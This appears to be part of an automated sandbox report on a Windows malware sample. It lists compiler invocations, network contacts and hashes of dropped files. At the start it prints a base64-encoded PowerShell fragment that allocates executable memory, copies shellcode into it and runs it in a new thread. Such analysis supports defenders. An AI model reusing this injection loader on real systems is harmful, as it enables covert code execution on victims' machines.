CQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABGAGUAUwBOAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABGAGUAUwBOAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABGAGUAUwBOACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnlr-kac.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38DD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC38DC.tmp"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | testme.com | udp |
| TW | 192.72.98.5:80 | tcp |
Files
memory/1708-0-0x0000000000400000-0x0000000000476000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | b6871bb612b0350b771280f6c95b4902 |
| SHA1 | 68281830cae5ee715ba3d85f46c67db1621f5dcb |
| SHA256 | f5e80d286d077ea62a999e9395b5eb49a3b4fe519100b5db8e2a647b75dabc70 |
| SHA512 | 096393da0d01cb09e77f196fef9769f1bc7f4618e4c2dfccc7e634e57939df08abb01e04340a99faac7e0b14dd9fa949d54c3a63079c6120aefe59be9fd8e010 |
\??\c:\Users\Admin\AppData\Local\Temp\gnlr-kac.cmdline
| MD5 | ac79210adb489947c774aa90662ba787 |
| SHA1 | 90c90291919bcceb605acc62c9319d720580cac4 |
| SHA256 | 83ebaec4c4d3cdc7e55736c5958dbec7aeb4da365a4d96a29564d83f55290afb |
| SHA512 | e304e7afaccdd35510a1636403a64832e164072aa2938650e97c9c70189d13ae7245f8f12e736d5fe59e63bf58d69bb8aeb2f2c00a24d173011029e83c2355bb |
\??\c:\Users\Admin\AppData\Local\Temp\gnlr-kac.0.cs
| MD5 | 7319070c34daa5f6f2ece2dfc07119ee |
| SHA1 | f26a4a48518a5608e93c8b77368f588b0433973c |
| SHA256 | b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc |
| SHA512 | 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd |
\??\c:\Users\Admin\AppData\Local\Temp\CSC38DC.tmp
| MD5 | f80729650f8f0526c3c5e6c891efee75 |
| SHA1 | 656d8a58d3bf4ad9298f3bc74097a890dc0bf43e |
| SHA256 | 49f6513126f0a42d8152ccf1e58b62c35bcd5c11e6cb58fc07fd8075d4ec1467 |
| SHA512 | 75df3c9dcf5895b49092d61de08ecb938961407dc347df86ba05f4b5d43c0223f0c16ad050871d2e6891a1a67b1f551b2e93c0fe8bc47e556af1ef2b7ec2cfac |
C:\Users\Admin\AppData\Local\Temp\RES38DD.tmp
| MD5 | bc429cab527bdae7fea6482775b95391 |
| SHA1 | 3baab5115b94f7d9c065440200464e6af2a84f91 |
| SHA256 | 5d0162a806205e8661c9fd72a99c3b48af55c0db129c2533cb968daeb9a7948a |
| SHA512 | 73bff415e35c1bb42b02897a5ee983922fb66f103e53c381cf3874bf088a35b5a29ad772a297fda4b25453f2025888b89f5fb21645c2d3bc26a05417b00c54fb |
C:\Users\Admin\AppData\Local\Temp\gnlr-kac.dll
| MD5 | 8ae45b56a4d40070bff2a57010ca829f |
| SHA1 | 07924b4f6fb54b3105d3dfb429bf482cd6609e5a |
| SHA256 | 47d84ae418a90f4120511e78492b0477f1085fc18b7419c63edccaec5ce9625a |
| SHA512 | 159033634a196cda3df156cc11b52b633610b2a5b2cb753a18728485972afaa6a05ff2c9383112e001ae8cdb9d8ff0fa3282bb44308134f8baaf812dc21a3170 |
C:\Users\Admin\AppData\Local\Temp\gnlr-kac.pdb
| MD5 | 80deabb48aef123c006aebcafef01f8d |
| SHA1 | ec14a45d86c617b7cb8974c467205265c35d462f |
| SHA256 | e0cf193162ff37f68e42fdc67ef7eac0ab7f1741ee42d308dafd4f1bda33ecad |
| SHA512 | 6702e163435ee4561c9c32a4c52be897ab3f0db59659f24bc9fb06d222757c3f14f0e3f3f61be77078a0bdc7270aed7450459794a68d13b89e1dfb8826230dff |
memory/2700-28-0x0000000005540000-0x0000000005541000-memory.dmp